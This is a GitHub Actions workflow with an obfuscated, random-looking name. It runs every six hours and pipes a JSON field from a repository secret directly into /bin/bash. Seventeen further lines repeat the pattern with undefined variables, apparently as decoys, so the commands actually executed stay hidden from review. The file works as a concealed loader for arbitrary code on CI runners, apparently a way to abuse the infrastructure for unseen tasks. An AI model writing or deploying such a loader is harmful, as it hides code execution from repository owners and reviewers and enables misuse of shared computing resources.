name: guozhongren1234
on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'

jobs:  # 10918
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guozhongren1234
        env:
          xpk2: ${{ secrets.xpk2 }}
        run: |
          echo $xpk2 | jq -r .aao27 | /bin/bash
          echo $ky6276 | jq -r .z22 | /bin/bash
          echo $s1 | jq -r .zics925 | /bin/bash
          echo $vvp418 | jq -r .go831 | /bin/bash
          echo $q591 | jq -r .x1 | /bin/bash
          echo $zhp70 | jq -r .lohsp736 | /bin/bash
          echo $qf4478 | jq -r .sl6116 | /bin/bash
          echo $en19 | jq -r .zlm14 | /bin/bash
          echo $nspdl48 | jq -r .s71 | /bin/bash
          echo $fm88 | jq -r .qejk12694 | /bin/bash
          echo $jayxt88 | jq -r .wemif9260 | /bin/bash
          echo $vku119 | jq -r .c539 | /bin/bash
          echo $nvvwo631 | jq -r .qctsy10 | /bin/bash
          echo $juod4820 | jq -r .ikz8 | /bin/bash
          echo $ira78 | jq -r .p9 | /bin/bash
          echo $tqd641 | jq -r .efll2 | /bin/bash
          echo $xxf11162 | jq -r .j8 | /bin/bash
          echo $e24 | jq -r .cntbb5 | /bin/bash

